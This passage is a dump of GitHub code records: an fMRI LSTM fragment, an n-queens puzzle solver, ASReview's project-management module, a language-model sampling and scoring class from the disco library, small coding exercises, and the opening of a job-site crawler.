2)[0] # global max for CNN\n # output = self.linear(output)\n # output = self.sig (output)\n\n # Global Max pooling\n\n # output = self.sig(output)\n # print(f\"lstm_out2 shape {lstm_out.shape}\")\n\n return output\n\n # Potential issue with VAE\n # Can't learn the representation to be classified\n # Current analysis strategy\n # ignore the temporal information\n # Try temporal functional connectivity\n # K-means clustering\n # 50 cluster\n # 50 connectivity temporal matrix\n # 100 fc-temporal connectivity as the input\n # Try ADHD dataset\n # Check the confusion matrix of SVM\n # Find paper on ADNI dataset\n # Try artificial data having distinct difference\n # Try adding dictinctive feature/noise to the data/functional connectivity to see if the DL model work","repo_name":"l-z-l/DeepL_on_fmri","sub_path":"models/LSTM.py","file_name":"LSTM.py","file_ext":"py","file_size_in_byte":3049,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"26656501888","text":"ans = [(None, None)] * 9\nanss = []\n\ndef check_safe(posi, posj) :\n #print(posi, posj)\n '''\n if posj == 0:\n return True\n for (i, j) in ans:\n if i is not None and j is not None:\n if posi == i or posj == j or abs(posi - i) == abs(posj - j):\n return False\n '''\n for j in range(0, posj):\n if posi == ans[j][0] or posj == ans[j][1] or abs(posi - ans[j][0]) == abs(posj - ans[j][1]):\n return False\n return True\n\ndef nine_queens(j):\n #print(j)\n if j == 9:\n anss.append([str(i + 1) for (i, j) in ans])\n return\n for i in range(0, 9):\n if check_safe(i, j):\n ans[j] = (i, j)\n nine_queens(j + 1)\n\nnine_queens(0)\n#print(len(anss), anss)\nanss_str = [''.join(i) for i in anss]\nprint(len(anss_str), anss_str)\n\nimport hashlib\n#s = hashlib.sha1()\nfor code in anss_str:\n s = hashlib.sha1()\n # Repeated update() calls are equivalent to a single call with the concatenation of all the arguments\n s.update(('zWp8LGn01wxJ7' + code + '\\n').encode('utf-8'))\n if s.hexdigest() == 'e48d316ed573d3273931e19f9ac9f9e6039a4242':\n print('answer is ', code)\n# 953172864\n","repo_name":"ryanoasis/demo","sub_path":"python/misc/coolshell_puzzles/7_nqueens.py","file_name":"7_nqueens.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38056259116","text":"__all__ = [\n \"ProjectError\",\n \"ProjectExistsError\",\n \"ProjectNotFoundError\",\n \"open_state\",\n \"ASReviewProject\",\n \"get_project_path\",\n \"project_from_id\",\n \"get_projects\",\n \"is_project\",\n \"is_v0_project\",\n]\n\nimport json\nimport logging\nimport os\nimport shutil\nimport tempfile\nimport time\nimport zipfile\nfrom contextlib import contextmanager\nfrom datetime import datetime\nfrom functools import wraps\nfrom pathlib import Path\nfrom uuid import uuid4\n\nimport jsonschema\nimport numpy as np\nfrom filelock import FileLock\nfrom scipy.sparse import csr_matrix\nfrom scipy.sparse import load_npz\nfrom scipy.sparse import save_npz\n\nfrom asreview._version import get_versions\nfrom asreview.config import LABEL_NA\nfrom asreview.config import PROJECT_MODE_SIMULATE\nfrom asreview.config import PROJECT_MODES\nfrom asreview.config import SCHEMA\nfrom asreview.data import ASReviewData\nfrom asreview.state.errors import StateNotFoundError\nfrom asreview.state.sqlstate import SQLiteState\nfrom asreview.utils import asreview_path\n\nPATH_PROJECT_CONFIG = \"project.json\"\nPATH_PROJECT_CONFIG_LOCK = \"project.json.lock\"\nPATH_FEATURE_MATRICES = \"feature_matrices\"\n\n\nclass ProjectError(Exception):\n pass\n\n\nclass ProjectExistsError(Exception):\n pass\n\n\nclass ProjectNotFoundError(Exception):\n pass\n\n\ndef get_project_path(folder_id):\n \"\"\"Get the project directory.\n\n Arguments\n ---------\n folder_id: str\n The id of the folder containing a project. If there is no\n authentication, the folder_id is equal to the project_id. Otherwise,\n this is equal to {project_owner_id}_{project_id}.\n \"\"\"\n return Path(asreview_path(), folder_id)\n\n\ndef project_from_id(f):\n \"\"\"Decorator function that takes a user account as parameter,\n the user account is used to get the correct sub folder in which\n the projects is\n \"\"\"\n\n @wraps(f)\n def decorated_function(project_id, *args, **kwargs):\n project_path = get_project_path(project_id)\n if not is_project(project_path):\n raise ProjectNotFoundError(f\"Project '{project_id}' not found\")\n project = ASReviewProject(project_path, project_id=project_id)\n return f(project, *args, **kwargs)\n\n return decorated_function\n\n\ndef get_projects(project_paths=None):\n \"\"\"Get the ASReview projects at the given paths.\n\n Arguments\n ---------\n project_paths : list[Path], optional\n List of paths to projects. By default all the projects in the asreview\n folder are used, by default None\n\n Returns\n -------\n list[ASReviewProject]\n Projects at the given project paths.\n \"\"\"\n if project_paths is None:\n project_paths = [path for path in asreview_path().iterdir() if path.is_dir()]\n\n return [ASReviewProject(project_path) for project_path in project_paths]\n\n\ndef is_project(project_path):\n project_path = Path(project_path) / PATH_PROJECT_CONFIG\n\n return project_path.exists()\n\n\ndef is_v0_project(project_path):\n \"\"\"Check if a project file is of a ASReview version 0 project.\"\"\"\n\n return not Path(project_path, \"reviews\").exists()\n\n\n@contextmanager\ndef open_state(asreview_obj, review_id=None, read_only=True):\n \"\"\"Initialize a state class instance from a project folder.\n\n Arguments\n ---------\n asreview_obj: str/pathlike/ASReviewProject\n Filepath to the (unzipped) project folder or ASReviewProject object.\n review_id: str\n Identifier of the review from which the state will be instantiated.\n If none is given, the first review in the reviews folder will be taken.\n read_only: bool\n Whether to open in read_only mode.\n\n Returns\n -------\n SQLiteState\n \"\"\"\n\n # Unzip the ASReview data if needed.\n if isinstance(asreview_obj, ASReviewProject):\n project = asreview_obj\n elif zipfile.is_zipfile(asreview_obj) and Path(asreview_obj).suffix == \".asreview\":\n if not read_only:\n raise ValueError(\"ASReview files do not support not read only files.\")\n\n # work from a temp dir\n tmpdir = tempfile.TemporaryDirectory()\n project = ASReviewProject.load(asreview_obj, tmpdir.name)\n else:\n project = ASReviewProject(asreview_obj)\n\n # init state class\n state = SQLiteState(read_only=read_only)\n\n try:\n if len(project.reviews) > 0:\n if review_id is None:\n review_id = project.config[\"reviews\"][0][\"id\"]\n logging.debug(f\"Opening review {review_id}.\")\n state._restore(project.project_path, review_id)\n elif len(project.reviews) == 0 and not read_only:\n review_id = uuid4().hex\n logging.debug(f\"Create new review (state) with id {review_id}.\")\n state._create_new_state_file(project.project_path, review_id)\n project.add_review(review_id)\n else:\n raise StateNotFoundError(\n \"State file does not exist, and in \" \"read only mode.\"\n )\n yield state\n finally:\n try:\n state.close()\n except AttributeError:\n # file seems to be closed, do nothing\n pass\n\n\nclass ASReviewProject:\n \"\"\"Project class for ASReview project files.\"\"\"\n\n def __init__(self, project_path, project_id=None):\n self.project_path = Path(project_path)\n self.project_id = project_id\n\n @classmethod\n def create(\n cls,\n project_path,\n project_id=None,\n project_mode=\"oracle\",\n project_name=None,\n project_description=None,\n project_authors=None,\n ):\n \"\"\"Initialize the necessary files specific to the web app.\"\"\"\n\n project_path = Path(project_path)\n\n if is_project(project_path):\n raise ProjectExistsError(\"Project already exists.\")\n\n if project_mode not in PROJECT_MODES:\n raise ValueError(\n f\"Project mode '{project_mode}' is not in \" f\"{PROJECT_MODES}.\"\n )\n\n if project_id is None:\n project_id = project_path.stem\n\n if project_name is None:\n project_name = project_path.stem\n\n if project_path.is_dir():\n raise IsADirectoryError(f\"Project folder {project_path} already exists.\")\n\n try:\n project_path.mkdir(parents=True, exist_ok=True)\n Path(project_path, \"data\").mkdir(exist_ok=True)\n Path(project_path, PATH_FEATURE_MATRICES).mkdir(exist_ok=True)\n Path(project_path, \"reviews\").mkdir(exist_ok=True)\n\n config = {\n \"version\": get_versions()[\"version\"],\n \"id\": project_id,\n \"mode\": project_mode,\n \"name\": project_name,\n \"description\": project_description,\n \"authors\": project_authors,\n \"created_at_unix\": int(time.time()),\n \"datetimeCreated\": str(datetime.now()),\n \"reviews\": [],\n \"feature_matrices\": [],\n }\n\n # validate new config before storing\n jsonschema.validate(instance=config, schema=SCHEMA)\n\n project_fp = Path(project_path, PATH_PROJECT_CONFIG)\n project_fp_lock = Path(project_path, PATH_PROJECT_CONFIG_LOCK)\n lock = FileLock(project_fp_lock, timeout=3)\n\n # create a file with project info\n with lock:\n with open(project_fp, \"w\") as f:\n json.dump(config, f)\n\n except Exception as err:\n # remove all generated folders and raise error\n shutil.rmtree(project_path)\n raise err\n\n return cls(project_path, project_id=project_id)\n\n @property\n def config(self):\n try:\n return self._config\n except AttributeError:\n project_fp = Path(self.project_path, PATH_PROJECT_CONFIG)\n project_fp_lock = Path(self.project_path, PATH_PROJECT_CONFIG_LOCK)\n lock = FileLock(project_fp_lock, timeout=3)\n\n try:\n with lock:\n # read the file with project info\n with open(project_fp, \"r\") as fp:\n config = json.load(fp)\n self._config = config\n\n return config\n\n except FileNotFoundError:\n raise ProjectNotFoundError(f\"Project '{self.project_path}' not found\")\n\n @config.setter\n def config(self, config):\n project_fp = Path(self.project_path, PATH_PROJECT_CONFIG)\n project_fp_lock = Path(self.project_path, PATH_PROJECT_CONFIG_LOCK)\n lock = FileLock(project_fp_lock, timeout=3)\n\n with lock:\n with open(project_fp, \"w\") as f:\n json.dump(config, f)\n\n self._config = config\n\n def update_config(self, **kwargs):\n \"\"\"Update project info\"\"\"\n\n kwargs_copy = kwargs.copy()\n\n # validate schema\n if \"mode\" in kwargs_copy and kwargs_copy[\"mode\"] not in PROJECT_MODES:\n raise ValueError(\"Project mode '{}' not found.\".format(kwargs_copy[\"mode\"]))\n\n # update project file\n config = self.config\n config.update(kwargs_copy)\n\n # validate new config before storing\n jsonschema.validate(instance=config, schema=SCHEMA)\n\n self.config = config\n return config\n\n def add_dataset(self, file_name):\n \"\"\"Add file path to the project file.\n\n Add file to data subfolder and fill the pool of iteration 0.\n \"\"\"\n self.update_config(dataset_path=file_name)\n\n # fill the pool of the first iteration\n fp_data = Path(self.project_path, \"data\", self.config[\"dataset_path\"])\n as_data = ASReviewData.from_file(fp_data)\n\n with open_state(self.project_path, read_only=False) as state:\n # save the record ids in the state file\n state.add_record_table(as_data.record_ids)\n\n # if the data contains labels, add them to the state file\n if (\n self.config[\"mode\"] != PROJECT_MODE_SIMULATE\n and as_data.labels is not None\n ):\n labeled_indices = np.where(as_data.labels != LABEL_NA)[0]\n labels = as_data.labels[labeled_indices].tolist()\n labeled_record_ids = as_data.record_ids[labeled_indices].tolist()\n\n # add the labels as prior data\n state.add_labeling_data(\n record_ids=labeled_record_ids,\n labels=labels,\n notes=[None for _ in labeled_record_ids],\n prior=True,\n )\n\n def remove_dataset(self):\n \"\"\"Remove dataset from project.\"\"\"\n # reset dataset_path\n self.update_config(dataset_path=None)\n\n # remove datasets from project\n shutil.rmtree(Path(self.project_path, \"data\"))\n\n # remove state file if present\n if Path(self.project_path, \"reviews\").is_dir() and any(\n Path(self.project_path, \"reviews\").iterdir()\n ):\n self.delete_review()\n\n def clean_tmp_files(self):\n \"\"\"Clean temporary files in a project.\n\n Arguments\n ---------\n project_id: str\n The id of the current project.\n \"\"\"\n\n # clean pickle files\n for f_pickle in self.project_path.rglob(\"*.pickle\"):\n try:\n os.remove(f_pickle)\n except OSError as e:\n print(f\"Error: {f_pickle} : {e.strerror}\")\n\n @property\n def feature_matrices(self):\n try:\n return self.config[\"feature_matrices\"]\n except Exception:\n return []\n\n def add_feature_matrix(self, feature_matrix, feature_extraction_method):\n \"\"\"Add feature matrix to project file.\n\n Arguments\n ---------\n feature_matrix: numpy.ndarray, scipy.sparse.csr.csr_matrix\n The feature matrix to add to the project file.\n feature_extraction_method: str\n Name of the feature extraction method.\n \"\"\"\n # Make sure the feature matrix is in csr format.\n if isinstance(feature_matrix, np.ndarray):\n feature_matrix = csr_matrix(feature_matrix)\n if not isinstance(feature_matrix, csr_matrix):\n raise ValueError(\n \"The feature matrix should be convertible to type \"\n \"scipy.sparse.csr.csr_matrix.\"\n )\n\n matrix_filename = f\"{feature_extraction_method}_feature_matrix.npz\"\n save_npz(\n Path(self.project_path, PATH_FEATURE_MATRICES, matrix_filename),\n feature_matrix,\n )\n\n # Add the feature matrix to the project config.\n config = self.config\n\n feature_matrix_config = {\n \"id\": feature_extraction_method,\n \"filename\": matrix_filename,\n }\n\n # Add container for feature matrices.\n if \"feature_matrices\" not in config:\n config[\"feature_matrices\"] = []\n\n config[\"feature_matrices\"].append(feature_matrix_config)\n\n self.config = config\n\n def get_feature_matrix(self, feature_extraction_method):\n \"\"\"Get the feature matrix from the project file.\n\n Arguments\n ---------\n feature_extraction_method: str\n Name of the feature extraction method for which to get the matrix.\n\n Returns\n -------\n scipy.sparse.csr_matrix:\n Feature matrix in sparse format.\n \"\"\"\n matrix_filename = f\"{feature_extraction_method}_feature_matrix.npz\"\n return load_npz(Path(self.project_path, PATH_FEATURE_MATRICES, matrix_filename))\n\n @property\n def reviews(self):\n try:\n return self.config[\"reviews\"]\n except Exception:\n return []\n\n def add_review(self, review_id, start_time=None, status=\"setup\"):\n \"\"\"Add new review metadata.\n\n Arguments\n ---------\n review_id: str\n The review_id uuid4.\n status: str\n The status of the review. One of 'setup', 'running',\n 'finished'.\n start_time:\n Start of the review.\n\n \"\"\"\n if start_time is None:\n start_time = datetime.now()\n\n # Add the review to the project.\n config = self.config\n\n review_config = {\n \"id\": review_id,\n \"start_time\": str(start_time),\n \"status\": status\n # \"end_time\": datetime.now()\n }\n\n # add container for reviews\n if \"reviews\" not in config:\n config[\"reviews\"] = []\n\n config[\"reviews\"].append(review_config)\n\n self.config = config\n\n def update_review(self, review_id=None, **kwargs):\n \"\"\"Update review metadata.\n\n Arguments\n ---------\n review_id: str\n The review_id uuid4. Default None, which is the\n first added review.\n status: str\n The status of the review. One of 'setup', 'running',\n 'finished'.\n start_time:\n Start of the review.\n end_time: End time of the review.\n \"\"\"\n\n # read the file with project info\n config = self.config\n\n if review_id is None:\n review_index = 0\n else:\n review_index = [x[\"id\"] for x in self.config[\"reviews\"]].index(review_id)\n\n review_config = config[\"reviews\"][review_index]\n review_config.update(kwargs)\n\n config[\"reviews\"][review_index] = review_config\n\n # update the file with project info\n self.config = config\n\n def delete_review(self, remove_folders=False):\n try:\n # remove the folder tree\n shutil.rmtree(Path(self.project_path, PATH_FEATURE_MATRICES))\n\n # recreate folder structure if True\n if not remove_folders:\n Path(self.project_path, PATH_FEATURE_MATRICES).mkdir(exist_ok=True)\n except Exception:\n print(\"Failed to remove feature matrices.\")\n\n try:\n path_review = Path(self.project_path, \"reviews\")\n shutil.rmtree(path_review)\n if not remove_folders:\n Path(self.project_path, \"reviews\").mkdir(exist_ok=True)\n except Exception:\n print(\"Failed to remove sql database.\")\n\n # update the config\n self.update_config(**{\"reviews\": [], \"feature_matrices\": []})\n\n def mark_review_finished(self, review_id=None):\n \"\"\"Mark a review in the project as finished.\n\n If no review_id is given, mark the first review as finished.\n\n Arguments\n ---------\n review_id: str\n Identifier of the review to mark as finished.\n \"\"\"\n\n self.update_review(\n review_id=review_id, status=\"finished\", end_time=str(datetime.now())\n )\n\n def export(self, export_fp):\n if Path(export_fp).suffix != \".asreview\":\n raise ValueError(\"Export file should have .asreview extension.\")\n\n if Path(export_fp) == Path(self.project_path):\n raise ValueError(\"export_fp should not be identical to project path.\")\n\n export_fp_tmp = Path(export_fp).with_suffix(\".asreview.zip\")\n\n # copy the source tree, but ignore pickle files\n shutil.copytree(\n self.project_path,\n export_fp_tmp,\n ignore=shutil.ignore_patterns(\"*.pickle\", \"*.lock\"),\n )\n\n # create the archive\n shutil.make_archive(export_fp_tmp, \"zip\", root_dir=export_fp_tmp)\n\n # remove the unzipped folder and move zip\n shutil.rmtree(export_fp_tmp)\n shutil.move(f\"{export_fp_tmp}.zip\", export_fp)\n\n @classmethod\n def load(cls, asreview_file, project_path, safe_import=False):\n tmpdir = tempfile.TemporaryDirectory().name\n\n try:\n # Unzip the project file\n with zipfile.ZipFile(asreview_file, \"r\") as zip_obj:\n zip_filenames = zip_obj.namelist()\n\n # raise error if no ASReview project file\n if PATH_PROJECT_CONFIG not in zip_filenames:\n raise ValueError(\"Project file is not valid project.\")\n\n # extract all files to folder\n for f in zip_filenames:\n if not f.endswith(\".pickle\"):\n zip_obj.extract(f, path=tmpdir)\n\n except zipfile.BadZipFile:\n raise ValueError(\"File is not an ASReview file.\")\n\n with open(Path(tmpdir, PATH_PROJECT_CONFIG), \"r\") as f:\n project_config = json.load(f)\n\n if safe_import:\n # assign a new id to the project.\n project_config[\"id\"] = uuid4().hex\n with open(Path(tmpdir, PATH_PROJECT_CONFIG), \"r+\") as f:\n # write to file\n f.seek(0)\n json.dump(project_config, f)\n f.truncate()\n\n # location to copy file to\n # Move the project from the temp folder to the projects folder.\n os.replace(tmpdir, Path(project_path, project_config[\"id\"]))\n\n return cls(Path(project_path, project_config[\"id\"]))\n\n def set_error(self, err, save_error_message=True):\n err_type = type(err).__name__\n self.update_review(status=\"error\")\n\n # write error to file if label method is prior (first iteration)\n if save_error_message:\n message = {\n \"message\": f\"{err_type}: {err}\",\n \"type\": f\"{err_type}\",\n \"datetime\": str(datetime.now()),\n }\n\n with open(Path(self.project_path, \"error.json\"), \"w\") as f:\n json.dump(message, f)\n\n def remove_error(self, status):\n error_path = self.project_path / \"error.json\"\n if error_path.exists():\n try:\n os.remove(error_path)\n except Exception as err:\n raise ValueError(f\"Failed to clear the error. {err}\")\n self.update_review(status=status)\n","repo_name":"asreview/asreview","sub_path":"asreview/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":19999,"program_lang":"python","lang":"en","doc_type":"code","stars":500,"dataset":"github-code","pt":"32"} +{"seq_id":"14383298882","text":"# your code goes here\nfrom collections import defaultdict\n\ndef beauty(s):\n d = defaultdict(int)\n d[(0,0)]=1\n count_a = 0\n count_b = 0\n count_c = 0\n res=0\n for char in s:\n if char == 'a':\n count_a+=1\n elif char=='b':\n count_b+=1\n elif char=='c':\n count_c+=1\n\n key = (count_a - count_b,count_b - count_c)\n\n res+=d[key]\n d[key]+=1\n \n return res\n\nt = int(input())\nfor i in range(t):\n svar = input()\n print(beauty(svar))","repo_name":"gbrahmam/DSA-practise","sub_path":"Beautiful String.py","file_name":"Beautiful String.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"16584412805","text":"import torch\nimport copy\nfrom transformers import AutoTokenizer, AutoModelForCausalLM, AutoModelForSeq2SeqLM, LogitsProcessorList\n\nfrom collections import namedtuple\n\nfrom .base_distribution import BaseDistribution\nfrom disco.utils.helpers import get_token_first_indices\n\n\nTextSample = namedtuple('TextSample', ['token_ids', 'text'])\n\nclass LMDistribution(BaseDistribution):\n \"\"\"\n Language model distribution class, a core class for all NLP\n use-cases, relying on Huggingface's Transformers library.\n \"\"\"\n\n def __init__(self,\n model=\"gpt2\", tokenizer=None, auto=AutoModelForCausalLM, freeze=True,\n length=40, device=\"cpu\",\n **config\n ):\n \"\"\"\n Parameters\n ----------\n model: string\n Transformers' name of a causal or seq2seq language model\n tokenizer: string\n Transformers' name for the related tokenizer\n auto: class\n auto class from Transformers, default is AutoModelForCausalLM\n but AutoModelForSeq2SeqLM is also valid\n freeze: boolean\n flag to eventually (not) freeze the network's parameters\n length: int\n number of tokens in the samples\n device: string\n reference of the computing device\n config: kwarg\n parameters and values passed to transformers' ```generate(…)```\n \"\"\"\n\n self.tokenizer= AutoTokenizer.from_pretrained(tokenizer if tokenizer else model)\n assert auto in [AutoModelForCausalLM, AutoModelForSeq2SeqLM], \"only AutoModel, AutoModelForCausalLM and AutoModelForSeq2SeqLM are valid options.\"\n self._load_network(auto, model)\n\n self.device = device\n self.network.to(self.device)\n self.network.eval() # to make sure scoring is consistent\n if freeze:\n self.freeze(True)\n\n self.length = length\n\n default_params = {\n \"top_k\": 0,\n \"top_p\": 1.0,\n \"typical_p\": 1.0,\n \"temperature\": 1.0,\n \"num_beams\": 1\n }\n self.params = default_params.copy()\n self.params.update(config)\n\n self.scorable = True if all(\\\n [default_params[k] == self.params[k] for k in default_params.keys()]\\\n ) else False\n\n def _load_network(self, auto, model):\n self.network = auto.from_pretrained(model)\n if not self.network.config.is_encoder_decoder:\n self.tokenizer.pad_token = self.tokenizer.eos_token\n self.network.config.pad_token_id = self.tokenizer.eos_token_id\n\n def to(self, device):\n self.device = device\n self.network.to(self.device)\n\n def freeze(self, frozen=True):\n \"\"\"Freeze (or unfreeze) parameters for gradient computation.\n\n Parameters\n ----------\n frozen: boolean (True)\n state to transition to, default is to freeze\n \"\"\"\n\n self.network.requires_grad_(not frozen)\n\n def log_score(self, samples, context=\"\", grad=False, sum=True):\n \"\"\"Computes log-probabilities for the samples according\n to the language model network in the given context\n\n Parameters\n ----------\n samples: list(Sample)\n samples to (log-)score as a list()\n context: text\n context for which to (log-)score the samples\n grad: boolean\n flag to eventually compute the gradients, e.g. when fitting\n sum: boolean\n flag to eventually return token-level tensor of scores\n\n Returns\n -------\n tensor of log-probabilities\n \"\"\"\n assert self.scorable, \"this distribution's parameters make it unscorable.\"\n shapes = set([s.token_ids.shape for s in samples])\n assert 1 == len(shapes), \"sequences of token_ids should have the same shape, but got: {shapes}.\"\n\n if self.network.config.is_encoder_decoder:\n assert context is not None and context != \"\", \"context (encoder input) is mandatory for encoder-decoder models\"\n elif not context:\n context = self.tokenizer.bos_token\n\n tokenized_context = self.tokenizer([context] * len(samples), return_tensors=\"pt\", add_special_tokens=True)\n tokenized_context[\"input_ids\"] = tokenized_context[\"input_ids\"].to(self.device)\n tokenized_context[\"attention_mask\"] = tokenized_context[\"attention_mask\"].to(self.device)\n\n tokenized_samples = dict()\n tokenized_samples[\"input_ids\"] = torch.stack([sample.token_ids for sample in samples]).to(self.device)\n\n tokenized_samples = self._discount_padding_tokens(tokenized_samples)\n\n input_ids, encoder_input_ids, forward_kwargs, labels, prompt_length, last = \\\n self._get_forward_inputs(tokenized_context, tokenized_samples, samples)\n\n if grad:\n outputs = self.network(**forward_kwargs, labels=labels)\n else:\n with torch.no_grad():\n outputs = self.network(**forward_kwargs, labels=labels)\n\n all_logits = outputs.logits[:, prompt_length:last, :] # [n_samples, length, vocab]\n\n all_logits = self._process_and_warp_logits(all_logits, input_ids, encoder_input_ids)\n\n all_logprobs = all_logits.log_softmax(-1)\n\n seq_logprobs = torch.gather(\n all_logprobs, 2, tokenized_samples[\"input_ids\"][:, :, None]\n ).squeeze(-1) # [n_samples, length]\n\n seq_logprobs = torch.where(1 == tokenized_samples[\"attention_mask\"], seq_logprobs, torch.tensor(0.).to(self.device))\n\n return seq_logprobs.sum(dim=1) if sum else seq_logprobs\n\n def _discount_padding_tokens(self, tokenized_samples):\n first_eos_indices = get_token_first_indices(\n tokenized_samples[\"input_ids\"],\n self.tokenizer.eos_token_id\n )\n tokenized_samples[\"attention_mask\"] = torch.where(\n self.tokenizer.pad_token_id == tokenized_samples[\"input_ids\"],\n 0, 1\n )\n for i, ix in enumerate(first_eos_indices):\n if None != self.network.config.forced_bos_token_id and\\\n self.network.config.forced_bos_token_id == tokenized_samples[\"input_ids\"][i][0]:\n tokenized_samples[\"attention_mask\"][i][0] = 0\n else:\n tokenized_samples[\"attention_mask\"][i][0] = 1 # at least score one token\n if ix != -1: # if there is an pad token\n tokenized_samples[\"attention_mask\"][i][ix] = 1 # score first pad token\n tokenized_samples[\"attention_mask\"][i][ix + 1:] = 0 # ignore everything after it\n tokenized_samples[\"attention_mask\"] = tokenized_samples[\"attention_mask\"].to(self.device)\n return tokenized_samples\n\n\n def _get_forward_inputs(self, tokenized_context, tokenized_samples, samples):\n if self.network.config.is_encoder_decoder:\n prompt_length = None\n last = -1\n encoder_input_ids = tokenized_context[\"input_ids\"]\n input_ids = tokenized_samples[\"input_ids\"]\n forward_kwargs = {\n \"input_ids\": encoder_input_ids,\n \"decoder_input_ids\": input_ids,\n }\n input_ids, forward_kwargs = self.network._prepare_decoder_input_ids_for_generation(len(samples),\n \"decoder_input_ids\",\n forward_kwargs)\n forward_kwargs['decoder_input_ids'] = input_ids\n labels = forward_kwargs[\"decoder_input_ids\"]\n else:\n prompt_length = tokenized_context[\"input_ids\"].shape[-1] - 1\n last = -1\n encoder_input_ids = None\n input_ids = torch.cat((tokenized_context[\"input_ids\"], tokenized_samples[\"input_ids\"]), 1)\n forward_kwargs = {\n \"input_ids\": input_ids,\n \"attention_mask\": torch.cat((tokenized_context[\"attention_mask\"], tokenized_samples[\"attention_mask\"]), 1)\n }\n labels = forward_kwargs[\"input_ids\"]\n\n return input_ids, encoder_input_ids, forward_kwargs, labels, prompt_length, last\n\n\n def _process_and_warp_logits(self, all_logits, input_ids, encoder_input_ids):\n generation_config = copy.deepcopy(self.network.generation_config)\n generation_config.update(**self.params)\n\n logits_warper = self.network._get_logits_warper(generation_config)\n\n logits_processor = self.network._get_logits_processor(\n generation_config=generation_config,\n input_ids_seq_length=input_ids.shape[-1],\n encoder_input_ids=encoder_input_ids,\n prefix_allowed_tokens_fn=None,\n logits_processor=LogitsProcessorList()\n )\n\n for i in range(all_logits.shape[1]): # [n_samples, length, vocab]\n all_logits[:,i,:] = logits_processor(input_ids[:,:i+1], all_logits[:,i,:])\n all_logits[:,i,:] = logits_warper(input_ids[:,:i+1], all_logits[:,i,:])\n\n return all_logits\n\n def sample(self, context=\"\", sampling_size=32, sum=True):\n \"\"\"Samples sequences from the language model in the given context\n\n Parameters\n ----------\n context: text\n contextual text for which to sample\n sampling_size: int\n number of sequences to sample\n sum: Boolean\n flag to eventually return token-level tensor of scores\n\n Returns\n -------\n tuple of (list of Sample(tokens, text), tensor of logprobs)\n \"\"\"\n if self.network.config.is_encoder_decoder:\n assert context is not None and context != \"\", \"context (encoder input) is mandatory for encoder-decoder models\"\n elif not context:\n context = self.tokenizer.bos_token\n\n input_ids = self.tokenizer([context] * sampling_size, return_tensors=\"pt\", add_special_tokens=True).input_ids.to(self.device)\n n_context_tokens = input_ids.shape[-1]\n\n generate_kwargs = dict(self.params)\n\n # encoder-decoder models have a hard-coded prompt with the context used for the encoder\n # In contrast, decoder-only models use the context as a prompt.\n if self.network.config.is_encoder_decoder:\n prompt_length = 1\n last = None\n torch.tensor([self.tokenizer.bos_token_id] * sampling_size).unsqueeze(-1).to(self.device)\n decoder_input_ids, generate_kwargs = self.network._prepare_decoder_input_ids_for_generation(sampling_size,\n \"decoder_input_ids\",\n generate_kwargs)\n generate_kwargs[\"decoder_input_ids\"] = decoder_input_ids\n else:\n prompt_length = n_context_tokens\n last = None\n\n outputs = self.network.generate(input_ids,\n output_scores=True, return_dict_in_generate=True,\n max_new_tokens=self.length,\n do_sample=True, **generate_kwargs)\n\n all_logprobs = torch.stack(outputs.scores, dim=1).log_softmax(-1) # [sampling_size, length, vocab]\n token_seq_logprobs = torch.gather(\n all_logprobs, 2, outputs.sequences[:, prompt_length:last][:, :, None]\n ).squeeze(-1) # [sampling_size, length]\n\n # we need to zero the (log-)scores of extra \n first_eos_indices = get_token_first_indices(\n outputs.sequences[:, prompt_length:last], # starting at 1 to skip an eventual bos token\n self.tokenizer.eos_token_id\n )\n non_pad_tokens = torch.cat(\n (outputs.sequences[:, prompt_length:last][:, 0].unsqueeze(1),\n torch.where(\n self.tokenizer.pad_token_id == outputs.sequences[:, prompt_length:last][:, 1:],\n -1,\n outputs.sequences[:, prompt_length:last][:, 1:])\n ),\n dim=1\n )\n non_pad_log_scores = torch.where(-1 != non_pad_tokens, token_seq_logprobs, torch.tensor(0.).to(self.device))\n for i, ix in enumerate(first_eos_indices):\n non_pad_log_scores[i][0] = token_seq_logprobs[i][0] # at least score one token\n if ix != -1: # if there an eos token\n non_pad_log_scores[i][ix] = token_seq_logprobs[i][ix] # keep the first eos scores\n non_pad_log_scores[i][ix + 1:] = 0. # ignore everything after eos\n\n seq_logprobs = non_pad_log_scores.sum(dim=1) if sum else non_pad_log_scores\n\n output_tokens = outputs.sequences[:, prompt_length:] # [sampling_size, length]\n\n return (\n [TextSample(ots, self.tokenizer.decode(ots)) for ots in output_tokens],\n seq_logprobs\n )\n","repo_name":"naver/disco","sub_path":"disco/distributions/lm_distribution.py","file_name":"lm_distribution.py","file_ext":"py","file_size_in_byte":12688,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"32"} +{"seq_id":"24394868158","text":"\"\"\"\nExercise 2: Write another program that prompts for a list of numbers as above and at the end prints out both the \nmaximum and minimum of the numbers instead of the average.\n\"\"\"\n\nfrom functools import reduce\nfrom typing import List\nfrom ex1 import getArrayOfNum\n\n\n# Functions\ndef analyseNumbers(nums: List[float]): \n results = {}\n\n results['total'] = reduce(lambda sum, currentVal: sum + currentVal, nums, 0)\n results['count'] = len(nums)\n results['max'] = max(nums)\n results['min'] = min(nums)\n results['array'] = nums.copy()\n\n return results;\n\n# CODE\n\nresults = analyseNumbers(getArrayOfNum())\n\nprint(f\"From the array: {results['array']}\\nMax: {results['max']}\\nMin: {results['min']}\")","repo_name":"EliGolam/studying-python","sub_path":"py4e-charles-serverance/chapter5/ex2.py","file_name":"ex2.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9446444186","text":"import requests\nfrom bs4 import BeautifulSoup\nimport time\nfrom datetime import datetime\nimport pickle\n\nclass AlbamonCrawler :\n def __init__(self) :\n self.base_url = 'https://www.albamon.com/'\n self.detail_source_list = [] #[(url, source)]\n \n def norm_age(self, age) :\n if age == \"무관\" :\n return (None, None)\n l = age.split()[0]\n l = int(l[:l.find('세')])\n r = age.split()[2]\n r = int(r[:r.find('세')])\n return (l, r)\n\n def norm_pay(self, pay) :\n return pay[:-1].replace(',', '')\n\n def norm_worktime(self, worktime) :\n if worktime.startswith('시간협의') : \n return (None, None)\n else :\n (l, r) = (worktime[:5], 